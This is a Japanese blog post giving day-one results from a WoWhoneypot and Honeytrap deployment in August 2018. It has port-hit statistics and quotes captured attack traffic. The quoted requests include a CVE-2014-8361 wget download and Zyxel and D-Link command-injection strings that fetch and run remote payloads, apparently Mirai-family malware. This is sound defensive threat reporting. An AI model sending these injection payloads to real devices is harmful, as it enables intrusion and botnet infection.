ハニーポット分析(1日目:2018/8/8)
現在、 WoWhoneypotやHoneytrapを運用していますが、アウトプットする
機会がなかったため、ブログで色々と情報発信出来ればと思い、
始めて見ました。
WoWhoneypotやHoneytrapなどの低対話型のハニーポットについては以前に資料を
作成しましたので、そちらを見てもらえればと思います。
Honeytrapの検知数が多く、まだ解析用の基盤が準備できていないので、
各ポートのペイロード分析やアクセス先のパス情報などは
後々やっていこうと考えています。
それまでは個人的に気になった点を書いていきます。
8/8 (水) の分析結果
1.Honeytrapで検知した攻撃
合計で 7078 件の検知がありましたが、ここでは件数が多かった
上位10件をピックアップします。
ポート番号 | 件数 | サービス |
445 | 2963 | SMB |
23 | 1067 | TELNET |
5038 | 1018 | PBXソフトウェア「Asterisk」 |
52869 | 160 | D-Link, Realtek SDK |
503 | 142 | intrinsa |
22 | 95 | SSH |
3306 | 87 | MySQL |
1433 | 83 | Microsoft SQL Server |
44818 | 65 | Ethernet/IP(Ethernet Industrial Protocol) |
2020 | 64 | SSH |
SMBやTELNET、SSH、などの狙われやすいポート以外に、D-LinkやAsteriskの
ポートへのアクセスが多かったです。
5038 ポートへのアクセスはデータサイズが 0byteであったため、
調査行為の通信と思われます。
ポート 52869 への通信は CVE-2014-8361 の脆弱性を狙ったもので
/picsdesc.xml へのPOST メソッドおよび wget コマンドで以下の
ファイルをダウンロードします。
wget http[:]//192[.]184[.]93[.]244/salvia[.]mips
→ IoT製品を狙ったmirai系のマルウェアと推測
2.WoWhoneypotで検知した攻撃
36件のアクセス内、D-linkの脆弱性とZyxel製ルータの脆弱性を観測しました。
Zyxel製ルータの脆弱性
GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca ; cd /tmp;wget http[:]//178[.]128[.]11[.]199/rvs -O /tmp/rz;chmod 777 /tmp/rz;sh /tmp/rz HTTP/1.0
→VirusTotal
D-linkの脆弱性
GET /login.cgi?cli=aa aa';wget http[:]//185[.]172[.]164[.]41/e -O -> /tmp/hk;sh /tmp/hk'$ HTTP/1.1s
→VirusTotal
いずれもアクセス自体はすで出来ませんでしたが、恐れく IoT製品を狙った
mirai系のマルウェアと思われます。
なるべく、更新できるように頑張っていきます。